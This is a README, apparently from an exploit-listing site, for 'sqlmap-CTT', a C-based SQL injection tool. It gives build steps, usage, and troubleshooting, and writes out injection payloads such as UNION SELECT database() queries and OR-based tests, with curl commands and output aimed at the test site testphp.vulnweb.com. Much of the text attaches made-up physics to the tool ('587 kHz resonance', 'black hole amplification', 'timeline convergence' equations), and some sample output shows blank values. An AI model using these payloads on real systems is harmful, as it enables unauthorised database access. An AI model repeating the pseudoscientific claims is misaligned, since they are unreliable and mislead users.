Share
## https://sploitus.com/exploit?id=54F875A2-9581-5404-A416-73AF8D3A5322
sqlmap-CTT
==========
sqlmap-CTT is an advanced SQL injection testing tool enhanced with Convergent Time Theory (CTT) principles. It extends the functionality of the open-source sqlmap project by integrating CTT-based techniques for payload generation, vulnerability detection, and database enumeration. Built in C, sqlmap-CTT leverages 587 kHz resonance timing, hardware entropy, timeline convergence, and black hole amplification to prioritize high-impact vulnerabilities.
Features
--------
- **Parameter Discovery**: Automatically identifies GET and POST parameters from URLs and HTML forms.
- **Multiple SQLi Techniques**: Supports error-based, boolean-based, time-based, and union-based SQL injection testing.
- **Database Enumeration**: Extracts database names, tables, columns, and data using targeted payloads.
- **CTT Integration**:
- **Payload Generation**: Uses hardware entropy (/dev/urandom) for dynamic payloads (Equation 2).
- **Vulnerability Detection**: Weights vulnerabilities with T-field (Equation 7) and convergence (Equation 4).
- **Enumeration Prioritization**: Prioritizes queries with mass modulation (Equation 10).
- **Real HTTP Requests**: Uses libcurl for robust HTTP GET and POST requests.
- **RPM Packaging**: Builds and installs on Fedora 42 (kernel 6.16.7-200.fc42.x86_64).
Installation
------------
1. **Prerequisites**:
Ensure you have `gcc`, `make`, `libcurl-devel`, and `rpm-build` installed:
```bash
sudo dnf install -y gcc make libcurl-devel rpm-build
```
2. **Clone the Repository**:
```bash
git clone https://github.com/SimoesCTT/sqlmap-ctt/
cd sqlmap-ctt
```
3. **Run the Setup Script**:
The provided `setup_sqlmap_ctt.sh` script automates the build and installation process:
```bash
chmod +x setup_sqlmap_ctt.sh
./setup_sqlmap_ctt.sh
```
This script:
- Cleans the project directory.
- Generates source files, headers, Makefile, and RPM spec.
- Builds the binary and installs it to `/usr/bin/sqlmap-ctt`.
- Creates and installs RPM packages (`sqlmap-ctt` and `sqlmap-ctt-utils`).
4. **Verify Installation**:
```bash
ls -l /usr/bin/sqlmap-ctt
rpm -q sqlmap-ctt sqlmap-ctt-utils
```
Expected output:
```
-rwxr-xr-x 1 root root Sep 14 2025 /usr/bin/sqlmap-ctt
sqlmap-ctt-1.0.0-1.fc42.x86_64
sqlmap-ctt-utils-1.0.0-1.fc42.x86_64
```
Usage
-----
Run sqlmap-CTT with a target URL:
```bash
sqlmap-ctt http://testphp.vulnweb.com/search.php?test=query
```
**Example Output**:
```
Initializing libcurl...
Initializing CTT resonance...
Testing parameter: searchFor
Sending GET request to: http://testphp.vulnweb.com/search.php?test=query&searchFor=%27%20OR%201234567890123456789%20--&goButton=go
Response time for payload 0: 0.309 seconds
SQLi vulnerability detected in payload 0: ' OR 1234567890123456789 --
[...]
Sending POST request with data: searchFor=' OR 1234567890123456789 --&goButton=go
Response time for payload 10: 0.305 seconds
Boolean-based SQLi vulnerability detected in payload 10: ' OR 1234567890123456789=0 --
[...]
Enumerating database for parameter: searchFor
Enumerating with GET: http://testphp.vulnweb.com/search.php?test=query&searchFor=%27%20UNION%20SELECT%20NULL%2C%20database%28%29%2C%20NULL%20--&goButton=go
Enumeration result: acuart
Enumerating with POST data: searchFor=' UNION SELECT NULL, database(), NULL --&goButton=go
POST enumeration result: acuart
[...]
Analyzing convergence...
Convergence score:
Prioritizing payloads for parameter: searchFor
High-impact payload: ' OR 1234567890123456789 -- (amplified response: , T-field: , vulnerable: yes)
[...]
Skipping submit parameter: goButton
```
CTT Integration
---------------
sqlmap-CTT incorporates Convergent Time Theory (CTT) to enhance performance:
- **587 kHz Resonance (Equation 9)**: `f_res = (α / (2π)) * √((m_T c^2) / E_P)` for precise timing.
- **Convergence Coefficient (Equation 2)**: `c(ξ) = e^{-ξ^2}` for timeline convergence.
- **Mass Modulation (Equation 10)**: `m(f) = m_0 * [1 + 0.17 * exp(-(f - f_res)^2 / (2σ^2))]` for query prioritization.
- **Temporal Wavefunction (Equation 4)**: `Ψ(t) = ∫_{0}^{1} c(ξ) ψ(t, ξ) dξ` for response analysis.
- **T-Field Equation (Equation 7)**: `χ = response_time * g + κ_E * ψ` for vulnerability weighting.
Dependencies
------------
- **libcurl**: For HTTP requests.
- **glibc**: For standard C library functions.
- **gcc**, **make**, **libcurl-devel**, **rpm-build**: For building and packaging.
License
-------
sqlmap-CTT is licensed under the GNU General Public License v2.0 or later. See the `LICENSE` file for details.
Troubleshooting
---------------
1. **Parameters Skipped**:
Debug the `parse_form_parameters` function:
```bash
gdb --args sqlmap-ctt http://testphp.vulnweb.com/search.php?test=query
(gdb) break parse_form_parameters
(gdb) run
(gdb) print params[*param_count].name
(gdb) print params[*param_count].is_submit
```
Check HTML:
```bash
curl -o response.html http://testphp.vulnweb.com
grep "<input" response.html
```
2. **Enumeration Fails**:
Verify the endpoint:
```bash
curl -I http://testphp.vulnweb.com/search.php?test=query
```
Test manually:
```bash
curl -X POST -d "searchFor=' UNION SELECT NULL, database(), NULL --&goButton=go" http://testphp.vulnweb.com/search.php?test=query
```
3. **False Positives**:
Check response content:
```bash
curl -o response.html "http://testphp.vulnweb.com/search.php?test=query&searchFor=%27%20OR%201=1%20--&goButton=go"
grep -i "sql syntax\|mysql_fetch\|database error" response.html
```
4. **libcurl Issues**:
Verify `libcurl`:
```bash
curl --version
```
Check network:
```bash
ping -c 4 testphp.vulnweb.com
```
Contributing
------------
Contributions are welcome! Please submit pull requests or issues to the GitHub repository: https://github.com/consciousness-project/sqlmap-ctt
Contact
-------
For questions or support, contact Americo Simoes at developer@consciousness.ai.